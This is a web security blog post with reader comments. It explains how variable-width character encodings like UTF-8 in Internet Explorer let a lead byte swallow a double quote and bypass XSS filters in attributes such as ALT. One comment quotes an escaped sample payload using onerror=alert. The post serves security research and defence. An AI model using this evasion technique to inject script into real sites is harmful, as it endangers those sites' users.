Cenzic 232 Patent
Paid Advertising
web application security lab

Variable Width Encoding

Just when you thought it was safe to jump back in the web security development waters something like this comes along. One of the things I’ve mentioned several times in my posts is that even once you figure out all this XSS stuff, you still need to make sure you have the proper encoding methods. My particular encoding method of choice is UTF-8. Then I read Cheng Peng Su’s explination of variable-width encodings filter evasion and my world shook for a moment. Truely shook.

Previously there were certain things you could assume are safe. Like, let’s say, an ALT tag in an image perhaps. The user should be allowed to enter anything in an ALT tag that they like, except the dreaded double quote that would jump them out of encapsulation. Well the way multi-byte works, it uses several characters and combines them into one. So if you butt a certain charachter up against another it renders as a third in the browser. Guess what, a double quote is a valid second char to butt up against. So if you put a certain set of chars butted up against a double quote you can now change that double quote into a meaningless third char which now keeps you encapsulated. Why is that good? Because we DO allow double quotes outside of the tags, because we are nice people and we like when people can quote things. When they put their own quote in after what we think is the end of the tag, that is now jumping them out of the encapsulation but within the realm of a valid HTML tag.

It’s all very confusing so I should probably give you an example. Click here in Internet Explorer. Excuse all the alert boxes, but that will show you which characters will work for this (it should also be noted that you actually don’t need the end angle bracket if you start another quote). It will just mess up the HTML, but for the purpose of the fuzzer output I had to put it in to keep it readable. It appears ASCII 192-253 and 255 all act as suitable starting double byte characters to jump out of quotes in UTF-8. As Cheng points out this is not limited to just UTF-8, but also GB2312, GB18030, BIG5, EUC-KR, EUC-JP, and SHIFT_JIS, although I think UTF-8 is by far the worst offender, even if it only affects Internet Explorer because of it’s prevalence. There’s a lot more research to be done here, with other chars and other encoding methods, but this is a fantastic start.

This is a very scary and very real possible exploit for any site that allows things like images with additional ALT parameters or inline style tags of any kind. This could have impacts all over the place. I will be curious to see how this plays out with the search engines (what encodings they are vulnerable to if any) for the blackhat SEO world. I applaud Cheng for finding this. It’s very easy to exploit if you know what you’re doing and very difficult to prevent.

6 Responses to “Variable Width Encoding”

  1. Edward Z. Yang Says:

    Well, if you’re escaping stray quotation marks inside and OUTSIDE of attributes (as the spec requires), this shouldn’t be a problem, because then you’d end up with:

    <IMG src="" ALT="XSS[char]"> XSS&quot; onerror=alert('54')&quot;>54

  2. RSnake Says:

    You’re absolutely right, if you know to escape quotes inside and outside, although I haven’t seen a lot of applications that do it outside of tags, and before I couldn’t think of a valid reason to do it other than for sheer paranoia (or if you wanted to make an argument that it may be used for SQL Injection I could handle that), but now it finally makes sense as to why you really should do it.

    Oh, and by the way, I had to modify your post quite a bit to get it to render properly, hope that’s okay.

  3. Edward Z. Yang Says:

    That’s fine, I was wondering why my comment was looking a bit strange.

  4. Albert Says:

    wow this was neet ^^ a new vector to add and a proof of concept that complexity just creates more holes in existing apps.

  5. ha.ckers.org web application security lab - Archive » XSSFuzz Released Says:

    […] Well, I am finally doing it, I’m releasing my stupid XSS fuzzer (duly named XSSFuzz). I’ve talked about it, fretted about it, and hated it long enough, and now it’s time to let you see for yourself how crappy it is. Yup, this is just about the worst contribution I’ve ever made to the web application security field, but it does have one valuable purpose. It’s particularly useful for identifying variable width encoding issues - a part of XSS that has had not nearly enough research done. Here’s the XSSFuzz screenshot. […]

  6. Top Web Hacks of 2006 » Hack Report Says:

    […] 1. Web Browser Intranet Hacking / Port Scanning - (with JavaScript and with HTML-only and the improved model) 2. Internet Explorer 7 “mhtml:” Redirection Information Disclosure 3. Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning 4. Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images) 5. Backdooring Media Files (QuickTime, Flash, PDF, Images, Word [2], and MP3’s) 6. Forging HTTP request headers with Flash 7. Exponential XSS 8. Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII) 9. Web Worms - (AdultSpace, MySpace, Xanga) 10. Hacking RSS Feeds […]